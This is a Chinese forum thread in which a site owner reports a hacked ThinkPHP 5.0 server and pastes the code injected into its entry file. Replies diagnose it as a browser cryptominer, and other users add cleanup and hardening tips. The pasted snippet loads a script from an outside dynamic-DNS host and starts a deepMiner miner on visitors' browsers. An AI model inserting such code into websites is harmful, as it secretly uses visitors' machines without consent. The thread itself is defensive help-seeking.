【linux】服务器又被入侵

使用 tp5.0 框架的入口文件被人写入不知道啥玩意的东西

求大佬!!!

阿里云服务器

wdlinux 系统

【linux】服务器又被入侵

echo "<script src='https://greenindex.dynamic-dns.net/jqueryeasyui.js'></script>

<script>

var uri = 'www';

var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});

if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {

jqueryui.start();

}

</script>";

回答

1.下载https://greenindex.dynamic-dn...
2.在函数deAES中将返回的字符串输出到控制台中,这些字符串就是真正运行的代码.
3.然后代入他下面写的运行代码,在中间调试.一步步调试 最多半天就能知道他干嘛的了.

貌似挖矿用的
https://github.com/deepwn/dee...

这个是修改PHP后的,

你应找到是哪里注入这一段。建议检查GET,POST

先找一找是哪里出现的漏洞,注入啊!文件包含啊! 然后看一下文件的权限

先修改文件属性,比如说把owner变成root:root

先把日志搂出来审计一遍

最近留意到几次这样的入侵
请问楼主服务器上是否安装了 FTP ?
电脑上使用的 FTP 客户端是?
我怀疑是 FTP 客户端上的后门

如果这代码是入侵者留下的,可以告诉你,你的每一个用户在帮他挖矿。

楼主,我的也中招了!
不是用TP的。
但是也是使用wdcp这个来搭的。
也是直接在我的程序入口处加了你贴出的那段代码。
查也查不到头绪。不知道是从哪里黑进来的。

我觉得问题出在tp或者程序的可能性更大一些。

wdlinux wdcp的重点在控制面板,安全需要自己做。先推荐把php整一整,apache权限,其次是ssh端口,关ftp,防火墙等等。

屏蔽php高危函数
http://www.yunxi365.cn/index....

你是是什么网站系统呀,用什么服务器呀,最近好多人都被入侵了呢。

以上是 【linux】服务器又被入侵 的全部内容, 来源链接: utcz.com/a/85202.html

回到顶部